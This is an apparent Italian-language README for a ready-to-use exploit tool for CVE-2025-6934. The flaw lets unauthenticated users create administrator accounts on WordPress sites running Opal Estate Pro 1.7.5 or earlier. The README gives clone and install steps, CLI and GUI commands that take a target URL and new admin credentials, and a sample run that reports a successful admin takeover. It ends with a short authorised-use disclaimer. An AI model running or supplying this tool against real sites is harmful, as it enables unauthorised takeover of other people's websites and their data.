
CVE-2025-6934 Strumento di sfruttamento - Creazione non autenticata di account amministratore nel plugin WordPress Opal Estate Pro
Creato e sviluppato interamente da mejbankadir (SMH tech e Mejban HackSheild sotto NexoAmicus)
CVE-2025-6934 è una vulnerabilità critica nel plugin WordPress Opal Estate Pro (versioni <= 1.7.5) che consente a utenti non autenticati di creare account amministratore su siti WordPress vulnerabili.
Questo strumento fornisce sia la versione CLI (Command Line) che GUI (Interfaccia Utente Grafica) per sfruttare questa vulnerabilità.
| Attributo | Valore |
|---|---|
| CVE ID | CVE-2025-6934 |
| Severità | Critical (CVSS 3.1: 9.8) |
| Plugin Affetto | Opal Estate Pro |
| Versioni Affette | <= 1.7.5 |
| Tipo di Vulnerabilità | Creazione non autenticata di account amministratore |
| Vettore CVSS | AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
# Clone the repository
git clone https://github.com/mejbankadir/CVE-2025-6934.git
cd CVE-2025-6934
# Install dependencies
pip install -r requirements.txt
requests
beautifulsoup4
colorama
PyQt6 # For GUI version only
python3 CVE-2025-6934-GUI.py
Caratteristiche GUI:
python3 CVE-2025-6934.py -u http://target.com -mail [email protected] -password P@ssw0rd123
Argomenti:
-u, --url URL del target (obbligatorio)
-mail, --newmail Email per l'account amministratore (obbligatorio)
-password, --newpassword Password per l'account amministratore (obbligatorio)
-user, --username Username per l'account amministratore (default: administrator)
┌─────────────────────────────────────────────────────────────┐
│ _____________ _______________ │
│ \_ ___ \ \ / /\_ _____/ │
│ / \ \/\ Y / | __)_ ______ │
│ \ \____\ / | \ /_____/ │
│ \______ / \___/ /_______ / │
│ \/ \/ │
│ │
│ CVE-2025-6934 Exploit PoC │
│ │
│ Created and developed fully by mejbankadir │
│ (SMH tech and Mejban HackSheild Under NexoAmicus) │
└─────────────────────────────────────────────────────────────┘
$ python3 CVE-2025-6934.py -u http://example.com -mail [email protected] -password MyP@ss123
[•] Starting Exploit Attempt...
[•] Nonce Found: a1b2c3d4e5f6...
[✔] Exploit Successful!
Username : administrator
Email : [email protected]
Password : MyP@ss123
Role : administrator
⚠️ AVVERTENZA: Questo strumento è fornito solo per scopi educativi e test di sicurezza autorizzati.
L'accesso non autorizzato a sistemi informatici è illegale e non etico.
Utilizzando questo strumento, accetti di:
- Testare solo sistemi di tua proprietà o per i quali hai esplicito permesso
- Non utilizzare questo strumento per scopi malevoli
- Accettare ogni responsabilità per eventuali conseguenze legali
| Ruolo | Nome |
|---|---|
| Creatore & Sviluppatore | mejbankadir |
| Organizzazione | SMH tech & Mejban HackSheild Under NexoAmicus |
CVE-2025-6934/
├── CVE-2025-6934.py # CLI version
├── CVE-2025-6934-GUI.py # GUI version
├── CVE-2025-6934.yaml # Documentation
├── requirements.txt # Python dependencies
└── README.md # This file
Lo strumento disabilita automaticamente gli avvisi SSL. Se incontri problemi:
requests.packages.urllib3.disable_warnings()
MIT License
Copyright (c) 2025 mejbankadir (SMH tech e Mejban HackSheild sotto NexoAmicus)
Fatto con ❤️ da mejbankadir
SMH tech | Mejban HackSheild | Sotto NexoAmicus